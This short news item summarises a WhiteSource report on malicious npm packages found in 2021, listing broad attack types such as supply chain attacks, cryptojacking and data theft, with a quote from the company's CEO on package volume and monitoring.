How threat actors are using npm to launch attacks
The report is based on findings from more than 1,300 malicious npm packages identified in 2021.
The company tracked an average of 32,000 new npm packages published every month during 2021. That level of activity enabled threat actors to launch a number of attacks, including:
- Software supply chain attacks: Used to steal data, corrupt targeted systems, and gain access throughout networks via lateral movement.
- Cryptojacking: When a threat actor takes control of a victim’s computing resources to mine cryptocurrency.
- Data stealing: Using keyloggers, screen scrapers, spyware, adware, bots, and more, attackers steal private and/or proprietary data from victims.
- Security research: Attackers create packages that falsely claim to be designed for security research but actually contain malicious code.
“With an average of over 17,000 new npm package versions being published daily in 2021, there’s no question that package update activity needs to be closely monitored,” said Rami Sass, CEO of WhiteSource. “Unfortunately, that popularity is being used by threat actors to spread malware and launch attacks that harm businesses and individuals.”